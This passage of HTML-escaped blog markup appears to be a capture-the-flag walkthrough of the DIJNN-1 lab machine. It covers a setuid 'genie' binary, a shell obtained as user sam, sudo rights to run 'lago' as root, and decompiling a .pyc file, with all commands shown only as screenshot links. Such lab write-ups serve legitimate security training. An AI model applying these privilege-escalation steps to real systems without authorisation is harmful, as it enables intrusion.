/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Checking &lt;b&gt;genie &lt;/b&gt;file type we discover it has &lt;b&gt;setuid&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQtMhlb1-jDBZNo2LyRNXQR1a1pH_1Q1rwmXyYkXjU9txs9OJT9vTQT1lMDeDdTsuFFf6b9qCZsTNCBahP_BzXAYDpA6Bv3Uwk3h5x7-mpWs1Ck8OYrq57CM0wUahw2fUWl81HsBwuCG2D/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;69&quot; data-original-width=&quot;666&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQtMhlb1-jDBZNo2LyRNXQR1a1pH_1Q1rwmXyYkXjU9txs9OJT9vTQT1lMDeDdTsuFFf6b9qCZsTNCBahP_BzXAYDpA6Bv3Uwk3h5x7-mpWs1Ck8OYrq57CM0wUahw2fUWl81HsBwuCG2D/s16000/screenshot.44.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2WM23epotW5SEUB-qB0plyqse3-Gzk2F65t41ybzhc6xxM5u_U5gEYP4hrpXNVtEDGeBlV-4qmDjpk_Z9sYwqv5wsOoDlH6ToGAjDZbIDnOILFTTOfZTOUq0czm-aISZc6ZmGE_ExS2O/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;553&quot; data-original-width=&quot;616&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2WM23epotW5SEUB-qB0plyqse3-Gzk2F65t41ybzhc6xxM5u_U5gEYP4hrpXNVtEDGeBlV-4qmDjpk_Z9sYwqv5wsOoDlH6ToGAjDZbIDnOILFTTOfZTOUq0czm-aISZc6ZmGE_ExS2O/s16000/screenshot.69.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Discovering how &lt;b&gt;genie&lt;/b&gt; works:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7V-nQdo3x-fDP3EhfZ3RSnGsZMtpPvikW5Jxq3n05O98G9JdpkMyWU_VIOXN5FhO1PjkuU4hKlxgRZqzVRn7yOnhNv9JApFat7lL0nXZA872MCINstODXg1Jxe0oKZ-Zs9lqMHcbWA5zz/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;321&quot; data-original-width=&quot;869&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7V-nQdo3x-fDP3EhfZ3RSnGsZMtpPvikW5Jxq3n05O98G9JdpkMyWU_VIOXN5FhO1PjkuU4hKlxgRZqzVRn7yOnhNv9JApFat7lL0nXZA872MCINstODXg1Jxe0oKZ-Zs9lqMHcbWA5zz/s16000/screenshot.45.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Passing some inputs to command &lt;b&gt;genie&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUDvZK4MNouxx_IEAkYlqEhw1HhH9xKkNR03r5ZMZTqcn-3TxF7tPwl2YjjgdKMBwh_eYtQ_6dojB9kxMMfvreSd70VlsNwsl5KLjiLADk1GAIlBh_LnalL0dXYO7_bD1eR5zv3bXsO1Rt/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;51&quot; data-original-width=&quot;709&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUDvZK4MNouxx_IEAkYlqEhw1HhH9xKkNR03r5ZMZTqcn-3TxF7tPwl2YjjgdKMBwh_eYtQ_6dojB9kxMMfvreSd70VlsNwsl5KLjiLADk1GAIlBh_LnalL0dXYO7_bD1eR5zv3bXsO1Rt/s16000/screenshot.46.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8iiTlwwWrNVldbarYv75YrurMrHsbg2ojoTAtR9aGwk3KUmlGjQQV8H3KZRqB8a1HP3TqTG6MdPrgtv0_DJlYGqXizsMnp3cbocwXyuxkvsG49KEp7otFrQkwVMq_TNsRMLWgcEkRWUSr/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;70&quot; data-original-width=&quot;756&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8iiTlwwWrNVldbarYv75YrurMrHsbg2ojoTAtR9aGwk3KUmlGjQQV8H3KZRqB8a1HP3TqTG6MdPrgtv0_DJlYGqXizsMnp3cbocwXyuxkvsG49KEp7otFrQkwVMq_TNsRMLWgcEkRWUSr/s16000/screenshot.47.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Finally we are able to get a shell for user &lt;b&gt;sam&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc6Rjjy1ShmcFtb5-LWqzmbHMPBoQg2PP5L8FowW7sOTNu7IxsXvib0Z6lrXwR-mTqdm0wK3fT3SzQU3d7iOictjUmryIx-LArg-EcVsF9fPQPAk5lyjNf_emXIXuCZ2G7g3h2Pl65Ta7Q/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;91&quot; data-original-width=&quot;570&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc6Rjjy1ShmcFtb5-LWqzmbHMPBoQg2PP5L8FowW7sOTNu7IxsXvib0Z6lrXwR-mTqdm0wK3fT3SzQU3d7iOictjUmryIx-LArg-EcVsF9fPQPAk5lyjNf_emXIXuCZ2G7g3h2Pl65Ta7Q/s16000/screenshot.48.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Checking &lt;b&gt;sam&lt;/b&gt;&#39;s sudoer privileges, he can run command &lt;b&gt;lago&lt;/b&gt; as a &lt;b&gt;root&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOkdO-7HvS8GnZrxsFkSv8PX7UPB4V4rD5JHRppH8W26LGIY8NCutwkUMmBDhiWFXw1KjV5gt5o9JosI51k0ggV9FlQQKQUkkbxrKELTxdbcVKhQ7uqZzIkBF8nK8Uu-HkoJxxuOrDEMuX/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;165&quot; data-original-width=&quot;628&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOkdO-7HvS8GnZrxsFkSv8PX7UPB4V4rD5JHRppH8W26LGIY8NCutwkUMmBDhiWFXw1KjV5gt5o9JosI51k0ggV9FlQQKQUkkbxrKELTxdbcVKhQ7uqZzIkBF8nK8Uu-HkoJxxuOrDEMuX/s16000/screenshot.49.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Running command &lt;b&gt;lago&lt;/b&gt; with different inputs:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyYdkNuV34aYm-lBCkPcF1_prXVybC07CJF0JFqBUUMCPm8o4SUtU76kh8tyC6lC51REXlxZaIlDsg7ZFikmdUdBwIId9ddOhrpAXiwF3GuB40RSxCl1QlONJlad2Jd2dNY48AATnQYJIW/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;185&quot; data-original-width=&quot;313&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyYdkNuV34aYm-lBCkPcF1_prXVybC07CJF0JFqBUUMCPm8o4SUtU76kh8tyC6lC51REXlxZaIlDsg7ZFikmdUdBwIId9ddOhrpAXiwF3GuB40RSxCl1QlONJlad2Jd2dNY48AATnQYJIW/s16000/screenshot.50.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTDJI8hHe2KHCH-jYoA0nHIrti_WuIHz0m5CIDDot3LdRrHBOOVh5rhrd0HWrL75LcQVaWrEuas3Mr5gdqsCJtcLlNok4O0UoB8eMNuZFc358s3yhToPywJBNmUu2idQhDTcEB0F6AqlNj/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;230&quot; data-original-width=&quot;381&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTDJI8hHe2KHCH-jYoA0nHIrti_WuIHz0m5CIDDot3LdRrHBOOVh5rhrd0HWrL75LcQVaWrEuas3Mr5gdqsCJtcLlNok4O0UoB8eMNuZFc358s3yhToPywJBNmUu2idQhDTcEB0F6AqlNj/s16000/screenshot.51.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ8B34r8r7QgTfYvNTcYVmIhyG1qtYUBorqNHhBY-ASFxVrnNUXZ8Q1fWvjHMh4dm7ZR7HjCoTAwnK2eAAJQgmDi3BstBOrHIq6OWJz7dXG831XSAAOXOJIiEbV-LRl-7OP_monXrt27Cq/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;208&quot; data-original-width=&quot;637&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ8B34r8r7QgTfYvNTcYVmIhyG1qtYUBorqNHhBY-ASFxVrnNUXZ8Q1fWvjHMh4dm7ZR7HjCoTAwnK2eAAJQgmDi3BstBOrHIq6OWJz7dXG831XSAAOXOJIiEbV-LRl-7OP_monXrt27Cq/s16000/screenshot.52.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU6zxqUI9iDRbrd_AlR35NHbR5szEO3EcJKoSbBqBeg2VuTMIttkydf4m0BQiNIOOls7Krvg3IJBdfBxvfGig-7VVfXhME1A9jygh_eVbmal4Q3mFerjMApkPFhb1tbEhU7ht-eik-eGPu/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;205&quot; data-original-width=&quot;544&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU6zxqUI9iDRbrd_AlR35NHbR5szEO3EcJKoSbBqBeg2VuTMIttkydf4m0BQiNIOOls7Krvg3IJBdfBxvfGig-7VVfXhME1A9jygh_eVbmal4Q3mFerjMApkPFhb1tbEhU7ht-eik-eGPu/s16000/screenshot.54.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Dl7u97MbOpMdI2a3qt7W35YNxABGdlr7KMZ5uMd7Q6lCKNd2jNjL8dGsr01IJ-woVNZeeAHbQcPKBA5NoC-mSKCrpYpXk4r_IMPWD4AGaNwfAx2urU74olv0Q22Kio02GockFZ2cyMmq/&quot; style=&quot;clear: left; display: inline; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;188&quot; data-original-width=&quot;289&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Dl7u97MbOpMdI2a3qt7W35YNxABGdlr7KMZ5uMd7Q6lCKNd2jNjL8dGsr01IJ-woVNZeeAHbQcPKBA5NoC-mSKCrpYpXk4r_IMPWD4AGaNwfAx2urU74olv0Q22Kio02GockFZ2cyMmq/s16000/screenshot.55.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Checking the file&amp;nbsp;&lt;b&gt;.pyc&lt;/b&gt;&amp;nbsp;we find that it&#39;s a compiled bytecode Python script:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpuDcDhHZYIuCgVcjyIEYgHcc1gPcNTU9zOKIEWsaUdPyLwwjs5qiFH-j-EW8fyTzbTdCn4s3-bBgGNeupwG9TnZbfgXv7yoYwbcb56TDw147nx5EGsijYhElhd5zIE4fwTn4dZ9OSTlJ0/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;353&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpuDcDhHZYIuCgVcjyIEYgHcc1gPcNTU9zOKIEWsaUdPyLwwjs5qiFH-j-EW8fyTzbTdCn4s3-bBgGNeupwG9TnZbfgXv7yoYwbcb56TDw147nx5EGsijYhElhd5zIE4fwTn4dZ9OSTlJ0/s16000/screenshot.71.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Also, opening &lt;b&gt;.pyc&amp;nbsp;&lt;/b&gt; we find a lot of words that recall of&amp;nbsp;&lt;b&gt;lago&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3T9Xww7mvHigSlbC0sL2bF9Qt5r4e_2Js9EthVnBZPfnZ6Nrr315BEiu1K0HiJPgHsGuX-Buh6iT9XLPSyU3t-a610X47wUWsGAzisUSigED7k42jwqtxUnguak5kiItrY9T-puoiHHRq/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;416&quot; data-original-width=&quot;1460&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3T9Xww7mvHigSlbC0sL2bF9Qt5r4e_2Js9EthVnBZPfnZ6Nrr315BEiu1K0HiJPgHsGuX-Buh6iT9XLPSyU3t-a610X47wUWsGAzisUSigED7k42jwqtxUnguak5kiItrY9T-puoiHHRq/s16000/screenshot.72.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So it seems reasonable to think that it could be a close relationship between &lt;b&gt;lago&lt;/b&gt; and &lt;b&gt;.pyc&lt;/b&gt;. Maybe are the same thing?&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp; With the purpose of studying in dept the file, let&#39;s transfer&amp;nbsp;&lt;b&gt;.pyc&lt;/b&gt; from &lt;b&gt;DIJNN-1&lt;/b&gt; to &lt;b&gt;Kali&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1s0vKIJZEUOJZgawVkhMxYHs_fe6dd9fs6ewB6OaUIkA2ol7-JXqwbIlAqZqdn4jbT75yLNLQI0Bym1WZPVtYZ_Yd37bRuEg59wfy5wzAaMM4MYKyW_QHX3yKUzizPSR5GAR-UevAfe11/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;266&quot; data-original-width=&quot;647&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1s0vKIJZEUOJZgawVkhMxYHs_fe6dd9fs6ewB6OaUIkA2ol7-JXqwbIlAqZqdn4jbT75yLNLQI0Bym1WZPVtYZ_Yd37bRuEg59wfy5wzAaMM4MYKyW_QHX3yKUzizPSR5GAR-UevAfe11/s16000/screenshot.73.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyE12Bny7yNW8cRs1Bq0P7JuBDhxJ2FzBVYDUs9zhcplETm3ZBXCUGcvAr1tKSAkm4iCNPOdCFdEADBy1H1FzOU_IH5OKom2gdpeKoAuQ0i0Ryo8qgTsS8imflVao_i79uUHhLz7KPaGfI/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;85&quot; data-original-width=&quot;363&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyE12Bny7yNW8cRs1Bq0P7JuBDhxJ2FzBVYDUs9zhcplETm3ZBXCUGcvAr1tKSAkm4iCNPOdCFdEADBy1H1FzOU_IH5OKom2gdpeKoAuQ0i0Ryo8qgTsS8imflVao_i79uUHhLz7KPaGfI/s16000/screenshot.74.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Installing decompiler &lt;b&gt;uncompyle6&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: 